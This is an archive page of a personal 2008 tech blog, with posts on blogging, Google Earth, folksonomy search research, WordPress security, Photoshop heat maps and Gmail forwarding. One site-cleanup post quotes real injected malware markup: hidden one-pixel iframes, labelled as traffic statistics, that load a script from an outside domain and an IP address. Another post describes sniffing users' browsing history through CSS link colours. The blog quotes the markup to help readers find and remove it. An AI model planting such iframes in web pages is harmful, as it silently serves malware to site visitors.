Archive for the ‘Blog’ Category

Why have a website, why create a blog, why Twitter?

Monday, June 9th, 2008

Golden Gate Bridge from the northMy esteemed colleague Beah just started blogging, and opened her blog with a very important question - Why Blog?  I remember people asking a similar question years ago when I registered this domain - why would you want to have a website with your name on it?  Almost the same question has come to my mind recently when playing around with Twitter.

So, why blog?  With all the hundreds of thousands of blogs on the web you might think there’s no need to ask this question.  One of the best things about social science is asking questions about things that everyone takes for granted.  Unfortunately the “science” part of social science is a bit too time-consuming to finish up on a Sunday-evening blog post, so instead we’ll look at a few sites of friends and colleagues and maybe collect some thoughts on what motivates people to blog.

First, why do I blog here?  I try to keep this blog relatively professional, posting mostly on topics that I encounter in my work, in my academic research, and in my side projects (the standard disclaimer, as always, applies).  One of my motivations was sharing some of the research done for classwork - it seemed a shame to write up a report, turn it in to a professor, and then let it gather dust in some corner of my hard drive.  My undergrad degree was in journalism and I do miss writing, so that’s another motive.  Also, having been through some rough patches in my career during the dot-com downturn, I thought blogging might help me establish a bit of a professional brand.  I have my URL on my resume and I would hope that any company looking to hire me would get an idea that I’m knowledgeable and interested in relevant areas.

But I’m not a very random sample, so let’s look at a few other blogs and try to appreciate why they write.  I think I can place them into a few rough categories:

Personal takes on professional / technical interests:

This is largely where my blog falls.  Common post topics will include things like “how to get around an annoying issue with some software/programming language,” “very excited about the new device from Apple,” “report from a conference,” and “very disappointed with the new device from Apple.”

Public journaling to keep in touch with friends and family:

I’ve done this in the past as well - blogs taking the place of those old-fashioned mass emails you used to send out freshman year of college.  If you went to college in the ancient days before blogs and Facebook.  This is a place for both epic travelogues and saved IM conversations filled with inside jokes.

Sharing interests and reviews:

This category runs the gamut from folks who just want to show their friends a funny Youtube video to blogging a season of a TV show to reviewers writing prolifically about a very obscure musical genre.

Artistic or literary expression:

Self-publishing has opened the doors for artists and writers, both amateur and professional, to share their work with whatever audience they find.  This can run from virtual serial galleries shows to community-driven commentary and learning.

Of course these all overlap, and some blogs cover all the bases.  See KooKoo for KokoPuffs for an example

So do we answer our question with a plethora of distinct motives for blogging?  Not necessarily.  There’s one theme that runs throughout all of the above - these are all social activities.  Ultimately blogging is human interaction.

Oh, and that other question - why use Twitter?  No clue.

Got a reason why you use Twitter?  Are you a co-worker angry at me for misconstruing your blog?  Please let me know in the comments below.

Sphere: Related Content

Google Earth vs. Reality, Revisited

Friday, June 6th, 2008

Last week I compared some real-life photos with the same scene in Google Earth.  Since I’m a bit of a computer/mapping/photography geek, I couldn’t resist doing a few more.  That actually ended up being a pretty popular post, with thousands of pageviews, which just goes to show I’m not the only combination computer/mapping/photography geek out there.

Here’s a view of San Francisco from Coit Tower on Telegraph Hill.  Follow this link to see larger versions in Flickr.  This one is even better than the two from last week - look how well the streets, buildings, and Golden Gate Bridge match with the photo.

Google Earth vs. Reality - San Francisco from Coit Tower

Now I’ll go a little more international.  Here’s a photo from the site of ancient Mycenae in Greece.  This is above the famous Lion Gate looking out tat the hills surrounding the Argolid plain.  See larger versions in Flickr.  The aerial photograph that Google Earth maps to the topography isn’t as detailed as the real life photo, but even the borders of the olive groves line up.

Google Earth vs. Reality - Mycenae, Greece

These next two are not as identical as the San Francisco cityscapes, but are still impressive because of how well they evoke the real life scenes without 3-d buildings.

The first is from the Acropolis in Athens, looking out over the surrounding neighborhood.  Larger versions in Flickr.

Google Earth vs. Reality - Athens from the Acropolis

Here’s another shot from the Acropolis showing the new Acropolis Museum.  Larger versions in Flickr.

Google Earth vs. Reality - Athens and the new Acropolis Museum

If you feel like making some comparisons of your own, please let me know in the comments below - I’d love to see what other people could come up with.

Sphere: Related Content

Scientific proof that Reddit should add a tagging system

Tuesday, June 3rd, 2008

First, a disclaimer: the title of this post is obviously exaggerated. Proof is an awfully big word to throw around, and although I employed pretty good experiment design practices and statistical checks, I can’t really prove that Reddit should do this or that. But I can show that what they are doing now is not working, at least when it comes to search.

So, I got an email the other day letting me know that my article, Tagging and Searching: Search Retrieval Effectiveness of Folkonsomies on the World Wide Web, is being published in the July 2008 issue of Information Processing and Management (here’s the official DOI link to the article). In the study I compared search performance between traditional search engines (like Google), subject directories (like Open Directory), and social bookmarking systems (like Reddit) and their folksonomies.

What’s a folksonomy? The word is a play on the term taxonomy - a taxonomy is a system of organizing and categorizing things, like the Dewey Decimal System. Taxonomies usually follow very strict rules and are controlled by experts. A folksonomy is a system of organization built by large numbers of regular users, who add things to the collection, evaluate them, and usually tag them with keywords.

IR-system-precision-1-20

In my study, the social bookmarking systems with tagging systems did surprisingly well - Del.icio.us was more precise than Open Directory, and at a cut off of 20 results it’s precision was fairly close to that of the search engines.

Reddit, however, did not fare so well. It consistently had the lowest precision, meaning that searches returned very few relevant results. There could be many reasons for this, but the biggest difference between Reddit and the others is the lack of tags.

Now, it’s possible that the folks at Reddit have no interest in search, or information retrieval in general. I think Reddit is very effective at bringing out new and interesting links on a daily basis and encouraging commentary (just my opinion, no stats to back that up). But I think it’s a big missed opportunity not to add tagging and see where it leads.

(One last disclaimer: this post is my personal opinion as someone who enjoys using Reddit and does not reflect on my employer. This post refers to research done independently as a grad student.)

Sphere: Related Content

A Scary, but Fascinating Idea - Javascript and CSS hack to see where your users have been

Friday, May 30th, 2008

Invasion of Segway infantry!

I just ran across this post on Aza Raskin’s blog about a technique used to cut down the number of social bookmarking links displayed to users.  I’m sure you’ve seen them–the 20 or so colorful buttons that have popped up at the bottom of every blog post on the web, for Digg, Del.icio.us and similar sites.  On my blog they are hidden behind the ShareThis Widget but Raskin had a better idea - why not just display the ones each user actually uses?

Impossible?  Not so fast - think about what happens when you visit a site.  After your visit any links to the site will change, usually from blue to purple.  We can put up links to each social bookmarking site and then use Javascript and CSS to check to see if each link has been visited.  If so, display the button, and if not, hide it.

This is a very cool way to manage buttons but the technique has wider privacy implications.  I could, for example, put links to…  questionable sites, and then use some Ajax to collect that information about users.  If I had other information about you (say you logged into my site or otherwise gave me an email address) I could link it together and build a database.

On the other hand, it’s not like I can grab your entire browsing history or follow you around after you leave my site - I have to specifically create a link and check it for every site I want to know about.  And unlike your browser history this info is cleared every time you close your browser.  So it’s not spyware or anything as intrusive as, say, the Alexa toolbar.

I can think of a bunch of cool ways to apply this technique, but I’m not sharing until I implement one.  Feel free to post any ideas (or misgivings) in the comments below.

Sphere: Related Content

Google Earth vs. Reality

Wednesday, May 28th, 2008

Google Earth is getting better and better and will soon be almost as good as actually being there. Don’t beleive me? I decided to pick a couple of shots and line up the same view in Google earth to compare. This first photo is from San Bruno Mountain (original photo here), showing the San Francisco skyline:

Google Earth vs. Reality - San Francisco

You should definitely click through to see the full-sized version. The version on the right is missing the flowers in the foreground and the clouds are a little different but otherwise it’s very recognizable.

Here’s another shot of San Francisco, this one from the bay (original photo here). I thought this would show off the detail of some of the 3d buildings in Google Earth. I had a hard time lining up a large screenshot because the photo was taken at 8x zoom, but you get the idea.

Google Earth vs. Reality - San Francisco from the Bay

Again, you should click though to the full sized version to get the full effect.

What do you think? Will Google Earth evolve to the point where no one will ever need to travel? My guess is that people will still get wanderlust and until Google unveils a food modem you’ll have to go get the sourdough yourself.

Let me know if you liked these in the comments and I’ll do a few more.

Sphere: Related Content

The Art of Information Graphics

Wednesday, May 14th, 2008

I recently ran across a couple of really great examples of how information can be conveyed dramatically with infromation graphics and one example of how to fix graphics that aren’t so good.

First, from the Radical Cartography project, a map of all nuclear explosions since 1945.  This map encodes a lot of information fairly simply - we can see where nuclear tests have taken place, countries are indicated by color, and blast yield is indicated by size.  Click on the image to see the full version.

Next, from the United Nations Environment Programme’s Global Environment Outlook report, you can see a great illustration of how little of the world’s water is freshwater and how little of that is readily available in rivers and lakes.  Click on the image to see the full-sized version.

Why point out good example of information design?  Because even the professionals get it very wrong a lot of the time.  Bob Nystrom wrote a great post about how little information is presented in CNN’s chart of the delegate totals for Hillary Clinton and Barack Obama.  Here’s their version:

Without looking at the numbers, can you tell who’s in the lead?  Can you tell how close the race is to the end?  Do you read the bars left-to-right or up-and-down?  Here’s Nystrom’s improvement:

Everything becomes clearer.

Got any good (or bad) examples?  Post them in the comments below.

Sphere: Related Content

Keep your Wordpress site from being hacked with automatic upgrades

Monday, May 5th, 2008

I’ve already written about what to do once your site has been hacked, but let’s talk a bit about hack prevention.

I think it’s fair to say that most people manage their own Wordpress installation because they have some programming background and want a little more control than you get with a hosted solution like Blogger or Wordpress.org.  Webmasters like you and me usually know a bit about security and how important it is to keep things up to date.  The problem is that every minute spent upgrading your CMS to the latest version is a minute not spent writing or running your business.

So you know you should download the latest patch, make backups, disable, plugins, install… but it’s already 1 a.m. and you need to meet clients in the morning, so you put it on the back burner and your site ends up hacked.  What’s the solution?  If you’re Technorati, the solution is to motivate bloggers a bit more by threatening to delist them.  I can understand their point of view.  But how about something a bit more positive - automation.

There are two ways I’ve automated Wordpress upgrades.  One is through Fantastico, which is a really cool script management system that your web host should probably provide.  I’m giving up on Fantastico, though, because it takes a long time for it to notice updates.

The second way I just tried out recently is the Wordpress Automatic Upgrade plugin.  I’ve tried it out on three blogs now and so far so good - it hasn’t skipped a beat.  This functionality really needs to be folded into Wordpress itself - with 2.5, they added the ability to automatically upgrade plugins but it seems like most security holes lately are found in the Wordpress code itself.

That plugin is Wordpress-only, but I recommend doing some research to see if there’s something similar out their for your blog software or CMS.  Even if Wordpress never has another security bug, there’s always Joomla, and Drupal, etc…

Sphere: Related Content

The Ethics of Web Apps, or, Ever try to get a list of your contacts from Facebook?

Sunday, April 20th, 2008

Jagged path Even before I worked at Google, I was pretty impressed by the “don’t be evil” motto.  Not that I think any company is perfect or that anyone can hire only saintly employees - but it’s impressive when anyone recognizes the ethical implications for what we do as programmers and web developers.

Now that I work there, I can tell you that everyone really seems to take it to heart (disclaimer:  this is my personal blog and I am not representing my employer in any way).  At this point, you may be asking, “programs are just lists of instructions, web sites are just products, what’s the ethical dilemma?”

I’ll give you an example.

I’m a big fan of Facebook, I think they’ve really done a great job building a social networking system, and it’s been very useful for keeping up with friends all over the world.  But I also have an account at LinkedIn, and Flickr, and Yelp, and an address book in Thunderbird, and another on my iPhone, and…  you get the picture.  So I’m trying to collect all my contacts together in one system (Gmail) so I can just import/export to keep all these different social networking systems up to date.

But Facebook doesn’t have a function to export a list of contacts and email addresses.  What’s more, they’ve apparently actively blocked attempts by developers to build systems to do it and disabled people’s accounts.

They are, of course, not legally obligated to let you export your contacts.  And if I were building a social networking site, it probably wouldn’t be the first feature I would implement.  But ethically, I think, they should do so.  Why?  We can refer to Kant’s categorical imperative or Jesus’ golden rule:  They should build open systems because they would like other systems to be open.

They certainly take advantage of the openness of other systems, allowing you to import contacts from Gmail.  Google’s social networking site, Orkut, will happily export your contacts, and I don’t think that’s an accident.  The engineers and product managers at Google make conscious choices to do the right thing.

But wait…  am I really asking them to make it easy for their users to take their data and go over to a competitor?  Isn’t that a bad business practice?

It’s possible, but beside the point.  I’m sure you and I could think of plenty of things that are profitable but morally repugnant.  What’s more, I don’t think it is a bad business practice at all.  I think that the walled garden approach is a sign of desperation rather than innovation.  Orkut is not the only one that lets you take your data with you - LinkedIn allows exports, for example.

Paul Graham wrote a really interesting post about this recently:

When you’re small, you can’t bully customers, so you have to charm them. Whereas when you’re big you can maltreat them at will, and you tend to, because it’s easier than satisfying them. You grow big by being nice, but you can stay big by being mean.

If you’d like to read more about this subject and see what some developers are doing to make your data more portable, check out DataPortability.org.

Sphere: Related Content

Web Video Usability Review: South Park Studios

Monday, March 31st, 2008

After a few years of Youtube showing the world how to do video on the web, lots of traditional broadcasters and studios have started putting their content online. Part of the reason is to try to steal YouTube’s thunder - a more market-friendly tactic than just lawsuits. Many of these sites are trying to figure out an advertising model and make money, while others are obviously trying to get viewers more engaged by joining social networks, making mash-ups, etc.

But enough about their goals, what about user goals and experience? In web video the content may be king but usability is almost as important. If your user interface is difficult, confusing, or unpleasant, users will leave your site to get the content elsewhere.

So I’m going to try to do a usability review of various web video sites over the next few weeks. These won’t be formal reviews with user tests and cool eye-tracking heatmaps. Instead I’ll point out some user goals and hold up each site to the same rubrick.

The first site: SouthParkStudios.com

southpark-screenshot

So, what do users want out of web video? I can think of a number of scenarios: finding a particular clip or episode, watching recent episodes, sending a link to a friend or embedding a clip in a blog, and , well, just enjoying the show.

Selection

Score: 4 out of 4 points. This site has everything - every show from every season.

Finding Particular Videos

Method: I’m taking a cue from the creators of Friends - people don’t remember episode names. So I’ll be doing a Google search for the show name and “the one where” and taking the first relevant result. In this case it’s “the one where Ben Affleck has a relationship with Cartman’s Jennifer Lopez hand” (without quotes).

Score: 2 out of 4 points. The search fails, but a simpler query for “Ben Affleck” leads us right to the clips. The full episode is available.

Watching Videos

How easy is it to watch videos? What’s the quality?

Score: 4 out of 4. It’s immediately apparent what to click on to see an episode or clip. You can watch videos full screen and South Park’s animation lends itself well to compressed video. The navigation between episodes is pretty nice, with thumbnails of all episodes for that season along the bottom of the window.

Linking to Videos

Score: 3 out of 4 points. The URL for each clip and episode is available by clicking the “Share” button. Clips open up in the main window so if you can get the link like any other web page. The only lost point is the fact the episodes open in new windows - what is the point? It takes away my browser toolbar and any social bookmaking toolbars or extensions I might normally use.

Embedding videos

Let’s give it a try:

Score: 3 out of 4 points. Once again use the Share button to get the embed code. They lose a point for not allowing embedding of full episodes - they probably have good reasons for not wanting users to do so, but we’re only concerned about the user’s side of things right now.


Advertising

Score: 3 out of 4 points. Ads are shown before the video (for clips) or at two break points about halfway through (for full episodes). Commercials are short and don’t obscure video or interrupt the show more than normal TV commericals would. They lose a point, though, because of the lack of variety - I watched a few episodes and plenty of clips and only saw two different commercials, over and over again.

Audio Experience

I’m going in go with a slightly different scale this time: introducing the patented Bleeding Ear Scale of Web Video Volume.

You may have noticed that some TV stations play their commercials a little louder than the show. The theory I’ve always heard is that they want you catch your attention even if you get up to go to the fridge.

Score:

bleeding earbleeding earbleeding earbleeding ear

Unfortunately, most people don’t watch web video the same way they watch TV - they’re usually sitting much, much closer to the speakers or wearing headphones. The bone-shattering difference in volume between the video and the commercials on SouthParkStudios.com earned the site four bleeding ears.

Total score: 19 out of 24 points, with a special note to dive for the volume button whenever an ad is coming up.

Sphere: Related Content

House hunting the geek way, Part 2: Data-driven maps in Photoshop

Friday, March 28th, 2008

In part 1 we created a simple heat map in Photoshop to figure out which neighborhoods would be good places to look for a new house. But distance from work and school isn’t the only factor worth considering. We can always add more radial gradients to show proximity to favorite restaurants, family members, and the like. But that’s really just more of the same.

Think about the things that make a neighborhood a pleasant place to be - low crime, low pollution, parks nearby, friendly neighbors - some of those things can be quantified and mapped. We’ll have to wait for demographers to release official neighborhood friendliness metrics after the next census, but let’s see if we can find some of the other data.

Step 3: Highlight on-map elements

At least one of the new factors we want to look at is already available on our map - parks. All the parks on the map are in one of two shades of green. Use the Magic Wand Tool to select park areas and then Select -> Similar. You can see how I’ve selected the parks in the example below.

megamap-example-parks

Now we’re going to do something similar to the concentric circles in step 2. Choose Select -> Modify -> Expand. You might have to play around with the number of pixels you expand by - for the scale I was working at, 20 pixels looked like close walking distance. Now use the fill tool with a low opacity to fill the area with the same color you used for the circles.

You can then repeat the expand and fill steps as many times as you like to build a heat map of park proximity. Don’t forget to change the blending mode to Multiply to match your other layers.

megamap-example-parks-heatm

You can follow similar steps for other on-map elements, like shopping centers, college campuses, bodies of water - it all depends on what you like to be near and what’s available on your base map.

Step 4 - Pulling in data maps

First, a disclaimer: this isn’t a tutorial on how to automatically pull data from a server and have Photoshop map it for you (but keep watching my blog for a similar project in the future). Instead, we’re going to pull data maps from other places on the web and fit them over our heatmap.

The hardest part of this next step is finding the maps. The number and quality of maps available depends on your location, but in general the best two places to look are county and city websites and nearby colleges. If you don’t find what you’re looking for under “Maps” try looking for “GIS,” planning departments, or property information. Also, many government web sites have poor search systems - try doing a Google search with the site operator instead. For example, a search for Cuyahoga County might look like this: site:cuyahogacounty.us maps gis.

For this example, I’m going to grab a map from Case Western Reserve University’s NEO CANDO site. Another good source for the Cleveland area is the the Cuyahoga County Brownfields GIS server. My wife and I both have graduate degrees and we really value education - so I’m going to grab a map of the percentage of people with bachelor degrees or higher by census tract.

Cuyahoga_NEOCANDO32443568931

Now that we have a data map, we need to clean it up a bit and add it to our base map. Open the data map in Photoshop and use the Magic Wand tool to select the black and gray areas - the lines and numbers. Use Select-> Similar to make sure uoi have most of it selected and hit Delete. Now Select All, Copy and Paste it into your map as a new layer.

You’ll might want to use the Magic Wand and Select-> Similar again to clear out all the white area around the map and leave it transparent, but you don’t have to - you’re going to change the layer blending mode to Overlay like the other layers anyway. At this point, I can almost guarantee that the data map will be much smaller than your base map. Chose Edit -> Transform -> Scale to stretch it to fit. There’s no sure-fire way to do this, just keep stretching until you have a good fit to known boundaries like coastlines and major streets.

Here’s the result:

megamap-example-college

Step 5 - Bring it all together

Now that we have all these different layers, it’s time to pull them all together in one heat map.  You have a few options on how to do this.  If you make all the layer visible at the same time your going to get a lot of very blue areas.  Instead, try lowering the opacity of each layer based on who important it is to you.  You can see an example of my Cleveland area map below.

megamap-example-final

If you want to make the strongest areas of the heat map more visible, start by making your base map invisible while leaving all your other layers up.  Go to Select -> color range and clikc the eye dropper on the darkest blue area you can find.  Now increase the Fuzziness until it looks like the best areas are selected.  Hit the OK button, create a new blank layer, turn off the rest of your layers, and fill the selection with your blue.  You can see the result below.

megamap-example-final2

Hopefully this has been helpful.  You don’t have to make your map quite as involved as mine, and of course if you are looking in a smaller area you can constrain your map further.

Stay tuned for more updates on this topic.  If you have a feed reader you can subscribe to my blog and if you’d like you can get email updates, too.

Sphere: Related Content

House hunting the geek way, Part 1: Using Photoshop to make heat maps

Wednesday, March 26th, 2008

If you’ve ever moved to a new city and looked for a house or apartment you know how difficult it can be.  What neighborhood, which side of town?  Can we live close to my wife’s workplace and not to far from mine?

I thought I would share the method I used to find our last house, using Photoshop to build a heat map of the city.  Note that this is NOT the method I used to find our current apartment - watch this space for more news on that coming up.

Step 1 - Build a map

In order to build our heat map you’ll need a base map to place everything on.  Back in 2004 when I did this project Mapquest was still the best thing going, so that’s what I used.  If I were doing it now, I would go with Google Maps.

This is the most tedious step, since you’ll need to center your map, take a screenshot, then cut the map portion of the screenshot and paste it into your working image.  If you have a scanner and a nice print map you’d like to use instead, feel free to go that route.

You can see my example, a map for the Greater Cleveland area, below.  Click to see a larger version.  The inset shows you the level of street detail I found best - zoomed in close enough to see all the streets, but not so close as to make your map unusably large.

megamap-example-plain

Step 2 - Place your main locations

What are the three most important factors in real estate?  Location, location, location.  In our case we want to live close to the locations we need to go to on a regular basis.  For us that was two workplaces and two universities.

Heat maps are a great way to visualize information.  They are a perfectly appropriate choice for map location and distance information.  So create a new layer in Photoshop.  Choose the gradient tool and make sure you’re using a Radial Gradient.  The gradient should go from a solid color (I chose blue) to transparent.  Using the map, create a radial gradient about as wide as you would like to drive.

These smooth gradients can make it hard to make distinctions when you are zoomed in and, on a large map, will take up a lot of disk space.  So an alternative method would be to create a series of coencentric circles, each smaller than the last.  That’s the method I used in the example below.

megamap-example-locations

Once you have one good circle layer, copy it for each of the locations you want on your map and drag them in to place.  You’re probably going to want to change the blending mode for the layers so that you can still see map details - I recommend using Multiply and lowering the opacity just a bit.

In my example map, you can already see how this could help narrow down which neighborhoods to look in.  It also shows quite visually that there’s no point in trying to live closer to Kent - it doesn’t intersect with any of the other hot spots.

In part 2, we’ll take a look at pulling in data maps for things like crime statistics , highlighting other map features, and pulling it all together.  Also, I’ll have an exciting announcement about another project I’ve been working on soon as well.  Stay tuned.

Sphere: Related Content

Fixing a ‘This site may harm your computer’ warning, part 3: Clearing a spammed forum

Saturday, March 22nd, 2008

Sun setting behind a sculpture in the park near Google Earlier I wrote about the steps you should take if your site has been hacked and is being slapped with a “This site may harm your computer” label. In that post we covered some of the sneaky ways scammers will insert text into your posts on Wordpress and other blog software.

But what if it’s even worse? Let’s say you installed a forum like phpBB to play around with but haven’t been keeping up with security updates. Or, even worse, your ftp account has been compromised and spammers have installed their own bulletin board or other content in a subfolder or subdomain. You don’t want Google and Yahoo thinking you are a spammer, so what do you do?

In that worst-case scenario, you’ll first need to change your passwords and make sure you have control of any and all ftp accounts, telnet accounts, etc. You may need to work with your host to make sure everything is locked down. Web server security is a big topic in it’s own right so from here on out we’ll assume you’ve already got that covered.

Step 1 - Delete the spam!

The first thing to do is delete the spammy bulletin board. Go ahead and delete all the contents of the directory. Don’t delete the directory itself quite yet. This does two things - it stops the spammers from getting any benefit from wayward visitors to your site and it causes your web server to start serving 404s (not found) to search engine spiders.

You can go one step further and explicitly tell browsers and spiders that this stuff is gone forever- by serving a 410 (gone). You can do this with any server-side language, my example will be in PHP. Create a new index.php file in your formerly-spammed directory that looks like this:

<?php header("HTTP/1.1 410 Gone");
header("Status: 410 Gone");?>

This will cover the main directory and then you can use mod_rewrite to redirect all the deleted pages to your 410 file.

Step 2 - Update your robots.txt

At this point search engine spiders will be able to figure out that the pages should be removed from their indexes, but only one page at a time as they re-crawl your site. You want it out of there ASAP, so create a robots.txt entry to tell spiders to stay away from the whole directory. It should look something like this:

User-agent: *
Disallow: /forum/

If the spam was in a subdomain, you’ll need to make sure you have a robots.txt file in the root directory of the subdomain that disallows the whole thing:

User-agent: *
Disallow: /

Step 3 - Tell Google about the spam

Log in to Google Webmaster Tools and look under Tools -> Remove URLs.  Create a new removal request for the subdirectory or subdomain you’ve cleaned.  This might seem a little redundant, since you’ve already done two steps that will let search engines know you’re no longer serving up spam.  But it’s worth being as explicit as possible to get your site’s reputation cleared as quickly as possible.

Bonus tip:  Subdomains and Google Webmaster Tools

If your spammed forum was in a subdomain, let’s say http://forum.exmaple.com, you’ll need to add the subdomain as a new site in Google Webmaster Tools.  You’ll need to go through the site verification process for the subdomain, too - it won’t verify automtically like if you had added a subdirectory as a new site.

By the way, if you’d like some more tips about keeping your site clean and tidy, check out this great post on the Google Webmaster Central Blog.

Any questions? Comments?  Tips that I’ve missed?  Please post in the comments section below.

Sphere: Related Content

Setting up a Firefox extension development environment

Sunday, March 16th, 2008

Procrastato, a Firefox productivity extension I have a Firefox extension called Procrastato.  It reminds you to get back to work when you’re mindlessly surfing the web.  Procrastato is a very simple add-on but I’ve found that getting started in developing Firefox add-ons isn’t so simple.

Although I’ve just dipped my feet into the world of XUL and Firefox Extension development I thought I would share what I’ve been using to get up and running.

First things first - take a look at the Building an Extension page at Mozilla.org.  Make sure you at least read through that page before getting started.  It can be a little disappointing to see how much you need to have in place in order to do a simple “hello world” test extension, but it’s worth getting an overall picture before jumping in.

Also, before getting to “hello world,” there are a couple of extensions that are useful for developing extensions:

If you’ve used Eclipse for Java or PHP development you’ll probably want to use it for extension development with the XulBooster plugin.  XulBooster is useful for two reasons:

  1. It helps with housekeeping chores like setting up your install.rdf and chrome.manifest and exporting a .xpi package.
  2. It give you some code coloring and syntax highlighting for those .xul files.

Now you should be ready to go.

A couple of notes:XulBooster will automatically include an empty <em:updateURL/> element in your install.rdf.  If you don’t have a secure URL for updates (starting with https://), you might get this warning from addons.mozilla.org when you try to upload your new version:

Add-ons cannot use an external updateURL. Please remove this from install.rdf and try again.

Just open the install.rdf file and deleted that line to solve the problem.

Sphere: Related Content

Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Thursday, March 6th, 2008

Earlier I wrote about what I did when my Wordpress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole - update Wordpress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage - search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name - request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src=”http://61.132.75.71/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe><br />
<!– End Traffic Statistics –>

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Antvirus warned me about a trojan horse in my temp folder.

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should Add that subdirectory as a new site in Webmaster Tools. Here’s an illustration (click to see full size):

webmaster-tools-subdir

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.comthat spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.

Sphere: Related Content

Tricky little issue in Gmail - how do you find the original sender of a forward?

Friday, February 29th, 2008

DSCN9755 I ran across a confusing issue in Gmail and I’d like to share what I did to resolve it.  It seems that Gmail won’t show you the original sender of a forwarded email by default in many cases.  Here’s how I found the issue and what I did to correct it.

My wife and I have a shared blog that automatically sends out updates to subscribers via Feedburner.  Feedburner is a great service if you have a blog, and you can use it to subscribe to my feed and get updates when I write on this blog as well.

When friends and family reply to an email from Feedburner, it goes to my email address and I need to forward it to my wife so she can read it too.  I use Mozilla Thunderbird as my email client so it’s easy to set up a filter to do it automatically (look under Tools –> Message Filters).  But when the forwarded email showed up in my wife’s Gmail inbox, it showed only me as the sender - with no mention of the original sender, so she couldn’t tell who was replying to our blog.

Gmail does let you see the original full text of the message - there’s a little down arrow next to Reply with a menu that includes “show original.”  Email headers are hardly user-friendly, though, so that’s not a very good solution.

It turns out that Gmail shows the name of the forwarder, not the name of the original sender, on forwards that are sent as an attachment.  If the forward was sent inline it’s easy to see the original sender in the body of the mail.  By default, Thunderbird sends forwards as attachments and I think Outlook has a similar default… in any event this is pretty common behavior.

To fix it from my end I went in Thunderbird, to Tools-> Options and selected the Composition icon.  Under the General tab, I changed Forward Messages to “Inline.”  This does the trick.

It would be nice, however, if Gmail made this a little more apparent in the user interface.  Maybe saying something like “[forwarder name] forwarding from [original sender name].”  Or it could be worked into the way conversations are viewed as threads.

This may not be a very common issue, so it might not warrant a change to Gmail, but it’s a small enough usability tweak that it might be worth it.  Hopefully you found this post helpful.

Sphere: Related Content